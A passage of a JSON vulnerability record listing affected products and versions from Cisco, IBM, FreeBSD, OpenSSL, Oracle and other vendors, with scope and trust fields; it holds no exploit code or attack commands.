"ne", "trust": 0.3, "vendor": "cisco", "version": "4.3" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "unified ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "69450" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "60008.3" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30.2-9" }, { "model": "abyp-0t-2s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70008.3" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.2" }, { "model": "webex meetings server ssl gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-110" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "prime network services controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "ironport email security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "9.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "prime collaboration provisioning", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.2" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-113" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "spa30x series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.30-12" }, { "model": "webex meetings client on premises", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "tivoli netcool system service monitors", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.3" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.19" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70100" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.3(1)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "bm security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.12" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.7" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.2" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5(.1.131)" }, { "model": "project openssl 1.0.2d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.3" }, { "model": "prime access registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "onepk all-in-one vm", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.1(1)" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "algo audit and compliance if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.32" }, { "model": "spa525g", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud manager with openstack interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.4" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "9.3-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "abyp-0t-2s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "unified attendant console department edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9971" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.29-9" }, { "model": "series ip phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "nexus series switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6000" }, { "model": "abyp-2t-0s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spa112 2-port phone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.5" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.1.1" }, { "model": "telepresence server mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70104.2" }, { "model": "webex messenger service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.20" }, { "model": "abyp-10g-4sr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "media experience engines", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "10.3-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "video distribution suite for internet streaming", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid router 15.6.2.15t", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3204.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.116" }, { "model": "cloupia unified infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5:20" }, { "model": "jabber for mac", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.7" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "agent desktop for cisco unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70000" }, { "model": "counter fraud management for safer payments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0" }, { "model": "telepresence server on multiparty media mr2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.2" }, { "model": "adaptive security appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70006.2.17" }, { "model": "digital media players series 5.3 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.0" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3204.1" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.7.3" }, { "model": "packet tracer", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.0" }, { "model": "network analysis module", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.3.1" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "unified wireless ip phone", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.5.1" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "security access manager for web", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "virtual security gateway vsg2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1.0" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "policy suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "webex meetings client on premises", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-2.7" }, { "model": "10.2-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "spa51x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "peoplesoft enterprise peopletools", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8.55" }, { "model": "unified ip conference phone for third-party call control", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "unified intelligence center", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5.1" }, { "model": "telepresence server on virtual machine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.4" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "common services platform collector", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.9.1" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.7" }, { "model": "project openssl 1.0.2e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.5(3.10000.9)" }, { "model": "hosted collaboration mediation fulfillment", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.5" }, { "model": "project openssl 1.0.1q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "dcm series 9900-digital content manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.16" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.3" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.0" }, { "model": "tivoli provisioning manager for os deployment intirim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.133" }, { "model": "telepresence sx series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "lancope stealthwatch flowcollector sflow", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "webex meetings client hosted", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "webex meetings for wp8", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.13" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-108" }, { "model": "sterling connect:express for unix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.13" }, { "model": "show and share", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2(2.1)" }, { "model": "webex meetings for wp8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1" }, { "model": "physical access control gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wide area application services", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.7" }, { "model": "9.3-release-p24", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex messenger service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.10" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "application and content networking system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.5.41" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "10.1-release-p30", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "9.3-release-p13", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.2.1" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "intelligent automation for cloud", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "0.9.8" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "edge digital media player 1.6rb4 5", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "300" }, { "model": "mds series multilayer switches 7.3.1dx", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99510" }, { "model": "abyp-10g-4sr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "9.3-release-p36", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.6" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89450" }, { "model": "digital media manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.4.1" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20280.6" }, { "model": "lancope stealthwatch flowsensor", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.2" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30002.8" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.12" }, { "model": "webex meeting center", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.11" }, { "model": "partner supporting service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.0" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.11" }, { "model": "mobility services engine", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.0" }, { "model": "edge digital media player", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3401.2.0.20" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1" }, { "model": "abyp-0t-4s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "spa30x series ip phones", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "unified series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "78000" }, { "model": "datapower gateways", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.8" }, { "model": "digital media players series 5.4 rb", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "10.2-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "security access manager for web", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "socialminer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.5" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.2.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.0" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.0" }, { "model": "spa112 2-port phone adapter", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli netcool system service monitors fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "intracer", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8" }, { "model": "jabber for apple ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6.2" }, { "model": "video surveillance series high-definition ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "40002.4.7" }, { "model": "video surveillance media server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "7.7" }, { "model": "9.3-release-p33", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.11.5" }, { "model": "tivoli provisioning manager for os deployment build", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1051.07" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "84200" }, { "model": "jabber for windows", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ironport email security appliance", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.2" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.112" }, { "model": "meetingplace", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "spa525g", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.6.5" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.3" }, { "model": "mmp server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.9.0.5" }, { "model": "9.3-release-p41", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "tivoli netcool system service monitors fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "telepresence integrator c series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "lancope stealthwatch udp director", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "cloud object store", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.8" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0" }, { "model": "cognos business intelligence fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.12" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.1.4" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "10.1-release-p25", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "webex meetings server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.5.1.5" }, { "model": "registered envelope service", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.0" }, { "model": "datapower gateways", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "lancope stealthwatch smc", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.8.1" }, { "model": "mq appliance m2001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "tivoli netcool system service monitors fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "cognos business intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "99710" }, { "model": "telepresence content server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "7.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(4)" }, { "model": "meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3104.4" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.0.2" }, { "model": "anyconnect secure mobility client for linux", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.0.6" }, { "model": "ata analog telephone adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1870" }, { "model": "asa cx and prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50003.5.12.21" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "13.1" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "anyconnect secure mobility client for android", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.2" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1)" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50007.3.1" }, { "model": "mediasense", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.5(3)" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.3.0" }, { "model": "systems director", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "unified ip phone 9.4.2sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8945" }, { "model": "security proventia network active bypass", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.18-49" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "10.0(1.10000.12)" }, { "model": "mq appliance m2000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "telepresence ex series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8.1.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.3" }, { "model": "digital media manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "5.2.3" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "mate design", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational insight", "scope": "eq", "trust": 